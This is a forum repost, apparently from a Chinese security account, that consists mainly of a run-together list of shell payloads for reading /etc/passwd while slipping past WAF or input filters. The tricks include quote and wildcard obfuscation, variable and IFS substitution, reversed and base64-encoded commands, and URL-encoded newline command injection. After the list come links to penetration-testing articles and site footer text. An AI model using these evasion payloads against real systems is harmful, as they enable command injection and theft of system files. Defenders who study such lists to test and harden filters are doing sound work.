From: @shreyasrxcat /etc/passwd cat /e"t"c/pa"s"swd cat /'e'tc/pa's' swd cat /etc/pa??wd cat /etc/pa*wd cat /et' 'c/passw' 'd cat /et$()c/pa$()$swdcat /et${neko}c/pas${poi} swd *echo "dwssap/cte/ tac" | rev $(echo Y2FOIC9ldGMvcGFzc3dkCg== base64 -d) w\ho\am\i /\b\i\n/////s\h who$@ami xyz%0Acat%20/etc/passwd IFS=,;`cat<<<uname,-a`/???/??t /???/p??s?? test=/ehhh/hmtc/pahhh/hmsswd cat ${test//hhh\/hm/} cat ${test//hh??hm/}cat /???/?????d{cat,/etc/passwd}




往期精彩


登陆页面的检测及渗透

渗透实战篇(一)

渗透测试信息收集的方法

常见Web中间件漏洞利用及修复方法

内网渗透 | 流量转发场景测试

Waf从入门到Bypass

实战渗透-看我如何拿下学校的大屏幕

技术篇:bulldog水平垂直越权+命令执行+提权

渗透工具实战技巧大合集 | 先收藏点赞再转发一气呵成


感兴趣的可以点个关注!!!

关注「安全先师」
把握前沿安全脉搏



1707.jpg
——我不是懒,我只是懒得签名而已。PS:汽泡菌
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2020 汽泡菌®精酿啤酒APP Whale shark Technology Co.,Ltd ( 陕ICP备19021550号 )|网站地图